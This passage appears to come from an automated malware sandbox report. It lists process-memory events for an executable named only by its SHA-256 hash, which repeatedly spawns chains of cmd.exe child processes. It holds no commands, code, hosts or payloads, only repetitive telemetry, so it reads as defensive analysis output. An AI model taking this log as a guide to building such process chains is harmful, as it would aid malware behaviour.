c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 601 PID 744 wrote to memory of 1292 744 cmd.exe 603 PID 744 wrote to memory of 1292 744 cmd.exe 603 PID 744 wrote to memory of 1292 744 cmd.exe 603 PID 744 wrote to memory of 1292 744 cmd.exe 603 PID 744 wrote to memory of 1616 744 cmd.exe 604 PID 744 wrote to memory of 1616 744 cmd.exe 604 PID 744 wrote to memory of 1616 744 cmd.exe 604 PID 744 wrote to memory of 1616 744 cmd.exe 604 PID 744 wrote to memory of 1400 744 cmd.exe 605 PID 744 wrote to memory of 1400 744 cmd.exe 605 PID 744 wrote to memory of 1400 744 cmd.exe 605 PID 744 wrote to memory of 1400 744 cmd.exe 605 PID 1400 wrote to memory of 1804 1400 cmd.exe 606 PID 1400 wrote to memory of 1804 1400 cmd.exe 606 PID 1400 wrote to memory of 1804 1400 cmd.exe 606 PID 1400 wrote to memory of 1804 1400 cmd.exe 606 PID 744 wrote to memory of 292 744 cmd.exe 607 PID 744 wrote to memory of 292 744 cmd.exe 607 PID 744 wrote to memory of 292 744 cmd.exe 607 PID 744 wrote to memory of 292 744 cmd.exe 607 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 608 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 608 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 608 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 608 PID 1444 wrote to memory of 1032 1444 cmd.exe 610 PID 1444 wrote to memory of 1032 1444 cmd.exe 610 PID 1444 wrote to memory of 1032 1444 cmd.exe 610 PID 1444 wrote to memory of 1032 1444 cmd.exe 610 PID 1444 wrote to memory of 1828 1444 cmd.exe 611 PID 1444 wrote to memory of 1828 1444 cmd.exe 611 PID 1444 wrote to memory of 1828 1444 cmd.exe 611 PID 1444 wrote to memory of 1828 1444 cmd.exe 611 PID 1444 wrote to memory of 1480 1444 cmd.exe 612 PID 1444 wrote to memory of 1480 1444 cmd.exe 612 PID 1444 wrote to memory of 1480 1444 cmd.exe 612 PID 1444 wrote to memory of 1480 1444 cmd.exe 612 PID 1480 wrote to memory of 1288 1480 cmd.exe 613 PID 1480 wrote to memory of 1288 1480 cmd.exe 613 PID 1480 wrote to memory of 1288 1480 cmd.exe 613 PID 1480 wrote to memory of 1288 1480 cmd.exe 613 PID 1444 wrote to memory of 912 1444 cmd.exe 614 PID 1444 wrote to memory of 912 1444 cmd.exe 614 PID 1444 wrote to memory of 912 1444 cmd.exe 614 PID 1444 wrote to memory of 912 1444 cmd.exe 614 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 615 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 615 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 615 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 615 PID 708 wrote to memory of 1040 708 cmd.exe 617 PID 708 wrote to memory of 1040 708 cmd.exe 617 PID 708 wrote to memory of 1040 708 cmd.exe 617 PID 708 wrote to memory of 1040 708 cmd.exe 617 PID 708 wrote to memory of 1760 708 cmd.exe 618 PID 708 wrote to memory of 1760 708 cmd.exe 618 PID 708 wrote to memory of 1760 708 cmd.exe 618 PID 708 wrote to memory of 1760 708 cmd.exe 618 PID 708 wrote to memory of 2020 708 cmd.exe 619 PID 708 wrote to memory of 2020 708 cmd.exe 619 PID 708 wrote to memory of 2020 708 cmd.exe 619 PID 708 wrote to memory of 2020 708 cmd.exe 619 PID 2020 wrote to memory of 1428 2020 cmd.exe 620 PID 2020 wrote to memory of 1428 2020 cmd.exe 620 PID 2020 wrote to memory of 1428 2020 cmd.exe 620 PID 2020 wrote to memory of 1428 2020 cmd.exe 620 PID 708 wrote to memory of 1948 708 cmd.exe 621 PID 708 wrote to memory of 1948 708 cmd.exe 621 PID 708 wrote to memory of 1948 708 cmd.exe 621 PID 708 wrote to memory of 1948 708 cmd.exe 621 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 622 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 622 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 622 PID 1436 wrote to memory of 1672 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 622 PID 1672 wrote to memory of 1748 1672 cmd.exe 624 PID 1672 wrote to memory of 1748 1672 cmd.exe 624 PID 1672 wrote to memory of 1748 1672 cmd.exe 624 PID 1672 wrote to memory of 1748 1672 cmd.exe 624 PID 1672 wrote to memory of 744 1672 cmd.exe 625 PID 1672 wrote to memory of 744 1672 cmd.exe 625 PID 1672 wrote to memory of 744 1672 cmd.exe 625 PID 1672 wrote to memory of 744 1672 cmd.exe 625 PID 1672 wrote to memory of 1728 1672 cmd.exe 626 PID 1672 wrote to memory of 1728 1672 cmd.exe 626 PID 1672 wrote to memory of 1728 1672 cmd.exe 626 PID 1672 wrote to memory of 1728 1672 cmd.exe 626 PID 1728 wrote to memory of 1460 1728 cmd.exe 627 PID 1728 wrote to memory of 1460 1728 cmd.exe 627 PID 1728 wrote to memory of 1460 1728 cmd.exe 627 PID 1728 wrote to memory of 1460 1728 cmd.exe 627 PID 1672 wrote to memory of 1248 1672 cmd.exe 628 PID 1672 wrote to memory of 1248 1672 cmd.exe 628 PID 1672 wrote to memory of 1248 1672 cmd.exe 628 PID 1672 wrote to memory of 1248 1672 cmd.exe 628 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 629 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 629 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 629 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 629 PID 1488 wrote to memory of 932 1488 cmd.exe 631 PID 1488 wrote to memory of 932 1488 cmd.exe 631 PID 1488 wrote to memory of 932 1488 cmd.exe 631 PID 1488 wrote to memory of 932 1488 cmd.exe 631 PID 1488 wrote to memory of 612 1488 cmd.exe 632 PID 1488 wrote to memory of 612 1488 cmd.exe 632 PID 1488 wrote to memory of 612 1488 cmd.exe 632 PID 1488 wrote to memory of 612 1488 cmd.exe 632 PID 1488 wrote to memory of 1120 1488 cmd.exe 633 PID 1488 wrote to memory of 1120 1488 cmd.exe 633 PID 1488 wrote to memory of 1120 1488 cmd.exe 633 PID 1488 wrote to memory of 1120 1488 cmd.exe 633 PID 1120 wrote to memory of 1628 1120 cmd.exe 634 PID 1120 wrote to memory of 1628 1120 cmd.exe 634 PID 1120 wrote to memory of 1628 1120 cmd.exe 634 PID 1120 wrote to memory of 1628 1120 cmd.exe 634 PID 1488 wrote to memory of 1464 1488 cmd.exe 635 PID 1488 wrote to memory of 1464 1488 cmd.exe 635 PID 1488 wrote to memory of 1464 1488 cmd.exe 635 PID 1488 wrote to memory of 1464 1488 cmd.exe 635 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 636 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 636 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 636 PID 1436 wrote to memory of 652 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 636 PID 652 wrote to memory of 1616 652 cmd.exe 638 PID 652 wrote to memory of 1616 652 cmd.exe 638 PID 652 wrote to memory of 1616 652 cmd.exe 638 PID 652 wrote to memory of 1616 652 cmd.exe 638 PID 652 wrote to memory of 1020 652 cmd.exe 639 PID 652 wrote to memory of 1020 652 cmd.exe 639 PID 652 wrote to memory of 1020 652 cmd.exe 639 PID 652 wrote to memory of 1020 652 cmd.exe 639 PID 652 wrote to memory of 1164 652 cmd.exe 640 PID 652 wrote to memory of 1164 652 cmd.exe 640 PID 652 wrote to memory of 1164 652 cmd.exe 640 PID 652 wrote to memory of 1164 652 cmd.exe 640 PID 1164 wrote to memory of 1944 1164 cmd.exe 641 PID 1164 wrote to memory of 1944 1164 cmd.exe 641 PID 1164 wrote to memory of 1944 1164 cmd.exe 641 PID 1164 wrote to memory of 1944 1164 cmd.exe 641 PID 652 wrote to memory of 996 652 cmd.exe 642 PID 652 wrote to memory of 996 652 cmd.exe 642 PID 652 wrote to memory of 996 652 cmd.exe 642 PID 652 wrote to memory of 996 652 cmd.exe 642 PID 1436 wrote to memory of 1664 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 643 PID 1436 wrote to memory of 1664 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 643 PID 1436 wrote to memory of 1664 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 643 PID 1436 wrote to memory of 1664 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 643 PID 1664 wrote to memory of 1220 1664 cmd.exe 645 PID 1664 wrote to memory of 1220 1664 cmd.exe 645 PID 1664 wrote to memory of 1220 1664 cmd.exe 645 PID 1664 wrote to memory of 1220 1664 cmd.exe 645 PID 1664 wrote to memory of 1880 1664 cmd.exe 646 PID 1664 wrote to memory of 1880 1664 cmd.exe 646 PID 1664 wrote to memory of 1880 1664 cmd.exe 646 PID 1664 wrote to memory of 1880 1664 cmd.exe 646 PID 1664 wrote to memory of 1848 1664 cmd.exe 647 PID 1664 wrote to memory of 1848 1664 cmd.exe 647 PID 1664 wrote to memory of 1848 1664 cmd.exe 647 PID 1664 wrote to memory of 1848 1664 cmd.exe 647 PID 1848 wrote to memory of 912 1848 cmd.exe 648 PID 1848 wrote to memory of 912 1848 cmd.exe 648 PID 1848 wrote to memory of 912 1848 cmd.exe 648 PID 1848 wrote to memory of 912 1848 cmd.exe 648 PID 1664 wrote to memory of 316 1664 cmd.exe 649 PID 1664 wrote to memory of 316 1664 cmd.exe 649 PID 1664 wrote to memory of 316 1664 cmd.exe 649 PID 1664 wrote to memory of 316 1664 cmd.exe 649 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 650 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 650 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 650 PID 1436 wrote to memory of 1132 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 650 PID 1132 wrote to memory of 1292 1132 cmd.exe 652 PID 1132 wrote to memory of 1292 1132 cmd.exe 652 PID 1132 wrote to memory of 1292 1132 cmd.exe 652 PID 1132 wrote to memory of 1292 1132 cmd.exe 652 PID 1132 wrote to memory of 1768 1132 cmd.exe 653 PID 1132 wrote to memory of 1768 1132 cmd.exe 653 PID 1132 wrote to memory of 1768 1132 cmd.exe 653 PID 1132 wrote to memory of 1768 1132 cmd.exe 653 PID 1132 wrote to memory of 872 1132 cmd.exe 654 PID 1132 wrote to memory of 872 1132 cmd.exe 654 PID 1132 wrote to memory of 872 1132 cmd.exe 654 PID 1132 wrote to memory of 872 1132 cmd.exe 654 PID 872 wrote to memory of 1484 872 cmd.exe 655 PID 872 wrote to memory of 1484 872 cmd.exe 655 PID 872 wrote to memory of 1484 872 cmd.exe 655 PID 872 wrote to memory of 1484 872 cmd.exe 655 PID 1132 wrote to memory of 1972 1132 cmd.exe 656 PID 1132 wrote to memory of 1972 1132 cmd.exe 656 PID 1132 wrote to memory of 1972 1132 cmd.exe 656 PID 1132 wrote to memory of 1972 1132 cmd.exe 656 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 657 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 657 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 657 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 657 PID 1412 wrote to memory of 1032 1412 cmd.exe 659 PID 1412 wrote to memory of 1032 1412 cmd.exe 659 PID 1412 wrote to memory of 1032 1412 cmd.exe 659 PID 1412 wrote to memory of 1032 1412 cmd.exe 659 PID 1412 wrote to memory of 820 1412 cmd.exe 660 PID 1412 wrote to memory of 820 1412 cmd.exe 660 PID 1412 wrote to memory of 820 1412 cmd.exe 660 PID 1412 wrote to memory of 820 1412 cmd.exe 660 PID 1412 wrote to memory of 1196 1412 cmd.exe 661 PID 1412 wrote to memory of 1196 1412 cmd.exe 661 PID 1412 wrote to memory of 1196 1412 cmd.exe 661 PID 1412 wrote to memory of 1196 1412 cmd.exe 661 PID 1196 wrote to memory of 1248 1196 cmd.exe 662 PID 1196 wrote to memory of 1248 1196 cmd.exe 662 PID 1196 wrote to memory of 1248 1196 cmd.exe 662 PID 1196 wrote to memory of 1248 1196 cmd.exe 662 PID 1412 wrote to memory of 1672 1412 cmd.exe 663 PID 1412 wrote to memory of 1672 1412 cmd.exe 663 PID 1412 wrote to memory of 1672 1412 cmd.exe 663 PID 1412 wrote to memory of 1672 1412 cmd.exe 663 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 664 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 664 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 664 PID 1436 wrote to memory of 1444 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 664 PID 1444 wrote to memory of 1040 1444 cmd.exe 666 PID 1444 wrote to memory of 1040 1444 cmd.exe 666 PID 1444 wrote to memory of 1040 1444 cmd.exe 666 PID 1444 wrote to memory of 1040 1444 cmd.exe 666 PID 1444 wrote to memory of 1816 1444 cmd.exe 667 PID 1444 wrote to memory of 1816 1444 cmd.exe 667 PID 1444 wrote to memory of 1816 1444 cmd.exe 667 PID 1444 wrote to memory of 1816 1444 cmd.exe 667 PID 1444 wrote to memory of 324 1444 cmd.exe 668 PID 1444 wrote to memory of 324 1444 cmd.exe 668 PID 1444 wrote to memory of 324 1444 cmd.exe 668 PID 1444 wrote to memory of 324 1444 cmd.exe 668 PID 324 wrote to memory of 1464 324 cmd.exe 669 PID 324 wrote to memory of 1464 324 cmd.exe 669 PID 324 wrote to memory of 1464 324 cmd.exe 669 PID 324 wrote to memory of 1464 324 cmd.exe 669 PID 1444 wrote to memory of 1768 1444 cmd.exe 670 PID 1444 wrote to memory of 1768 1444 cmd.exe 670 PID 1444 wrote to memory of 1768 1444 cmd.exe 670 PID 1444 wrote to memory of 1768 1444 cmd.exe 670 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 671 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 671 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 671 PID 1436 wrote to memory of 708 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 671 PID 708 wrote to memory of 1972 708 cmd.exe 673 PID 708 wrote to memory of 1972 708 cmd.exe 673 PID 708 wrote to memory of 1972 708 cmd.exe 673 PID 708 wrote to memory of 1972 708 cmd.exe 673 PID 708 wrote to memory of 432 708 cmd.exe 674 PID 708 wrote to memory of 432 708 cmd.exe 674 PID 708 wrote to memory of 432 708 cmd.exe 674 PID 708 wrote to memory of 432 708 cmd.exe 674 PID 708 wrote to memory of 1164 708 cmd.exe 675 PID 708 wrote to memory of 1164 708 cmd.exe 675 PID 708 wrote to memory of 1164 708 cmd.exe 675 PID 708 wrote to memory of 1164 708 cmd.exe 675 PID 1164 wrote to memory of 744 1164 cmd.exe 676 PID 1164 wrote to memory of 744 1164 cmd.exe 676 PID 1164 wrote to memory of 744 1164 cmd.exe 676 PID 1164 wrote to memory of 744 1164 cmd.exe 676 PID 708 wrote to memory of 820 708 cmd.exe 677 PID 708 wrote to memory of 820 708 cmd.exe 677 PID 708 wrote to memory of 820 708 cmd.exe 677 PID 708 wrote to memory of 820 708 cmd.exe 677 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 678 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 678 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 678 PID 1436 wrote to memory of 1828 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 678 PID 1828 wrote to memory of 1672 1828 cmd.exe 680 PID 1828 wrote to memory of 1672 1828 cmd.exe 680 PID 1828 wrote to memory of 1672 1828 cmd.exe 680 PID 1828 wrote to memory of 1672 1828 cmd.exe 680 PID 1828 wrote to memory of 1608 1828 cmd.exe 681 PID 1828 wrote to memory of 1608 1828 cmd.exe 681 PID 1828 wrote to memory of 1608 1828 cmd.exe 681 PID 1828 wrote to memory of 1608 1828 cmd.exe 681 PID 1828 wrote to memory of 912 1828 cmd.exe 682 PID 1828 wrote to memory of 912 1828 cmd.exe 682 PID 1828 wrote to memory of 912 1828 cmd.exe 682 PID 1828 wrote to memory of 912 1828 cmd.exe 682 PID 912 wrote to memory of 1528 912 cmd.exe 683 PID 912 wrote to memory of 1528 912 cmd.exe 683 PID 912 wrote to memory of 1528 912 cmd.exe 683 PID 912 wrote to memory of 1528 912 cmd.exe 683 PID 1828 wrote to memory of 1816 1828 cmd.exe 684 PID 1828 wrote to memory of 1816 1828 cmd.exe 684 PID 1828 wrote to memory of 1816 1828 cmd.exe 684 PID 1828 wrote to memory of 1816 1828 cmd.exe 684 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 685 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 685 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 685 PID 1436 wrote to memory of 1464 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 685 PID 1464 wrote to memory of 1768 1464 cmd.exe 687 PID 1464 wrote to memory of 1768 1464 cmd.exe 687 PID 1464 wrote to memory of 1768 1464 cmd.exe 687 PID 1464 wrote to memory of 1768 1464 cmd.exe 687 PID 1464 wrote to memory of 1444 1464 cmd.exe 688 PID 1464 wrote to memory of 1444 1464 cmd.exe 688 PID 1464 wrote to memory of 1444 1464 cmd.exe 688 PID 1464 wrote to memory of 1444 1464 cmd.exe 688 PID 1464 wrote to memory of 1428 1464 cmd.exe 689 PID 1464 wrote to memory of 1428 1464 cmd.exe 689 PID 1464 wrote to memory of 1428 1464 cmd.exe 689 PID 1464 wrote to memory of 1428 1464 cmd.exe 689 PID 1428 wrote to memory of 1132 1428 cmd.exe 690 PID 1428 wrote to memory of 1132 1428 cmd.exe 690 PID 1428 wrote to memory of 1132 1428 cmd.exe 690 PID 1428 wrote to memory of 1132 1428 cmd.exe 690 PID 1464 wrote to memory of 432 1464 cmd.exe 691 PID 1464 wrote to memory of 432 1464 cmd.exe 691 PID 1464 wrote to memory of 432 1464 cmd.exe 691 PID 1464 wrote to memory of 432 1464 cmd.exe 691 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 692 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 692 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 692 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 692 PID 1032 wrote to memory of 1728 1032 cmd.exe 694 PID 1032 wrote to memory of 1728 1032 cmd.exe 694 PID 1032 wrote to memory of 1728 1032 cmd.exe 694 PID 1032 wrote to memory of 1728 1032 cmd.exe 694 PID 1032 wrote to memory of 708 1032 cmd.exe 695 PID 1032 wrote to memory of 708 1032 cmd.exe 695 PID 1032 wrote to memory of 708 1032 cmd.exe 695 PID 1032 wrote to memory of 708 1032 cmd.exe 695 PID 1032 wrote to memory of 1460 1032 cmd.exe 696 PID 1032 wrote to memory of 1460 1032 cmd.exe 696 PID 1032 wrote to memory of 1460 1032 cmd.exe 696 PID 1032 wrote to memory of 1460 1032 cmd.exe 696 PID 1460 wrote to memory of 1412 1460 cmd.exe 697 PID 1460 wrote to memory of 1412 1460 cmd.exe 697 PID 1460 wrote to memory of 1412 1460 cmd.exe 697 PID 1460 wrote to memory of 1412 1460 cmd.exe 697 PID 1032 wrote to memory of 1608 1032 cmd.exe 698 PID 1032 wrote to memory of 1608 1032 cmd.exe 698 PID 1032 wrote to memory of 1608 1032 cmd.exe 698 PID 1032 wrote to memory of 1608 1032 cmd.exe 698 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 699 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 699 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 699 PID 1436 wrote to memory of 612 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 699 PID 612 wrote to memory of 1120 612 cmd.exe 701 PID 612 wrote to memory of 1120 612 cmd.exe 701 PID 612 wrote to memory of 1120 612 cmd.exe 701 PID 612 wrote to memory of 1120 612 cmd.exe 701 PID 612 wrote to memory of 1828 612 cmd.exe 702 PID 612 wrote to memory of 1828 612 cmd.exe 702 PID 612 wrote to memory of 1828 612 cmd.exe 702 PID 612 wrote to memory of 1828 612 cmd.exe 702 PID 612 wrote to memory of 324 612 cmd.exe 703 PID 612 wrote to memory of 324 612 cmd.exe 703 PID 612 wrote to memory of 324 612 cmd.exe 703 PID 612 wrote to memory of 324 612 cmd.exe 703 PID 324 wrote to memory of 1832 324 cmd.exe 704 PID 324 wrote to memory of 1832 324 cmd.exe 704 PID 324 wrote to memory of 1832 324 cmd.exe 704 PID 324 wrote to memory of 1832 324 cmd.exe 704 PID 612 wrote to memory of 1444 612 cmd.exe 705 PID 612 wrote to memory of 1444 612 cmd.exe 705 PID 612 wrote to memory of 1444 612 cmd.exe 705 PID 612 wrote to memory of 1444 612 cmd.exe 705 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 706 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 706 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 706 PID 1436 wrote to memory of 1572 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 706 PID 1572 wrote to memory of 432 1572 cmd.exe 708 PID 1572 wrote to memory of 432 1572 cmd.exe 708 PID 1572 wrote to memory of 432 1572 cmd.exe 708 PID 1572 wrote to memory of 432 1572 cmd.exe 708 PID 1572 wrote to memory of 1616 1572 cmd.exe 709 PID 1572 wrote to memory of 1616 1572 cmd.exe 709 PID 1572 wrote to memory of 1616 1572 cmd.exe 709 PID 1572 wrote to memory of 1616 1572 cmd.exe 709 PID 1572 wrote to memory of 996 1572 cmd.exe 710 PID 1572 wrote to memory of 996 1572 cmd.exe 710 PID 1572 wrote to memory of 996 1572 cmd.exe 710 PID 1572 wrote to memory of 996 1572 cmd.exe 710 PID 996 wrote to memory of 1484 996 cmd.exe 711 PID 996 wrote to memory of 1484 996 cmd.exe 711 PID 996 wrote to memory of 1484 996 cmd.exe 711 PID 996 wrote to memory of 1484 996 cmd.exe 711 PID 1572 wrote to memory of 748 1572 cmd.exe 712 PID 1572 wrote to memory of 748 1572 cmd.exe 712 PID 1572 wrote to memory of 748 1572 cmd.exe 712 PID 1572 wrote to memory of 748 1572 cmd.exe 712 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 713 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 713 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 713 PID 1436 wrote to memory of 1412 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 713 PID 1412 wrote to memory of 1608 1412 cmd.exe 715 PID 1412 wrote to memory of 1608 1412 cmd.exe 715 PID 1412 wrote to memory of 1608 1412 cmd.exe 715 PID 1412 wrote to memory of 1608 1412 cmd.exe 715 PID 1412 wrote to memory of 1640 1412 cmd.exe 716 PID 1412 wrote to memory of 1640 1412 cmd.exe 716 PID 1412 wrote to memory of 1640 1412 cmd.exe 716 PID 1412 wrote to memory of 1640 1412 cmd.exe 716 PID 1412 wrote to memory of 1816 1412 cmd.exe 717 PID 1412 wrote to memory of 1816 1412 cmd.exe 717 PID 1412 wrote to memory of 1816 1412 cmd.exe 717 PID 1412 wrote to memory of 1816 1412 cmd.exe 717 PID 1816 wrote to memory of 1196 1816 cmd.exe 718 PID 1816 wrote to memory of 1196 1816 cmd.exe 718 PID 1816 wrote to memory of 1196 1816 cmd.exe 718 PID 1816 wrote to memory of 1196 1816 cmd.exe 718 PID 1412 wrote to memory of 1768 1412 cmd.exe 719 PID 1412 wrote to memory of 1768 1412 cmd.exe 719 PID 1412 wrote to memory of 1768 1412 cmd.exe 719 PID 1412 wrote to memory of 1768 1412 cmd.exe 719 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 720 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 720 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 720 PID 1436 wrote to memory of 324 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 720 PID 324 wrote to memory of 544 324 cmd.exe 722 PID 324 wrote to memory of 544 324 cmd.exe 722 PID 324 wrote to memory of 544 324 cmd.exe 722 PID 324 wrote to memory of 544 324 cmd.exe 722 PID 324 wrote to memory of 912 324 cmd.exe 723 PID 324 wrote to memory of 912 324 cmd.exe 723 PID 324 wrote to memory of 912 324 cmd.exe 723 PID 324 wrote to memory of 912 324 cmd.exe 723 PID 324 wrote to memory of 1628 324 cmd.exe 724 PID 324 wrote to memory of 1628 324 cmd.exe 724 PID 324 wrote to memory of 1628 324 cmd.exe 724 PID 324 wrote to memory of 1628 324 cmd.exe 724 PID 1628 wrote to memory of 432 1628 cmd.exe 725 PID 1628 wrote to memory of 432 1628 cmd.exe 725 PID 1628 wrote to memory of 432 1628 cmd.exe 725 PID 1628 wrote to memory of 432 1628 cmd.exe 725 PID 324 wrote to memory of 1728 324 cmd.exe 726 PID 324 wrote to memory of 1728 324 cmd.exe 726 PID 324 wrote to memory of 